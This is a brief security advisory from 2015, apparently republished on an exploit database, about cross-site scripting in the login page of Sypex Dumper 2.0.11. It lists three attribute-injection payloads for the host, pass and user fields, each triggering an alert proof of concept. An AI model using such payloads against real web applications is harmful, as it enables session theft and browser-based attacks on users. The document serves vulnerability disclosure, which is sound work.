###########################

# Sypex Dumper 2.0.11 Cross Site Scripting Vulnerability

###########################

Credits: John Page ( hyp3rlinx )
Domains: hyp3rlinx.altervista.org

Source:
http://hyp3rlinx.altervista.org/advisories/AS-SYPEX0529.txt

Vendor:
https://sypex.net


Product:
Sypex Dumper 2.0.11 is a PHP web based MySQL database management system.


Advisory Information:
================================================
Sypex Dumper 2.0.11 XSS Vulnerabilities

XSS

Vulnerability Details:
=====================
Login page input fields are vulnerable to XSS via POST method.
Allowing remote attackers to execute arbitrary code in the
context of an user's browser session.


Exploit code(s):
===============

host="onMouseOver="alert(666);
pass="onMouseOver="alert(666);
user="onMouseOver="alert(666);


Disclosure Timeline:
=========================================================


Vendor Notification: May 27, 2015
May 29, 2015: Public Disclosure



Severity Level:
=========================================================
Med


Description:
==========================================================

Request Method(s):
[+] POST

Vulnerable Product:
[+] Sypex Dumper 2.0.11

Vulnerable Parameter(s):
[+] host, pass, user

Affected Area(s):
[+] Login page

===============================================================

(hyp3rlinx)

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2015-06-12]

###########################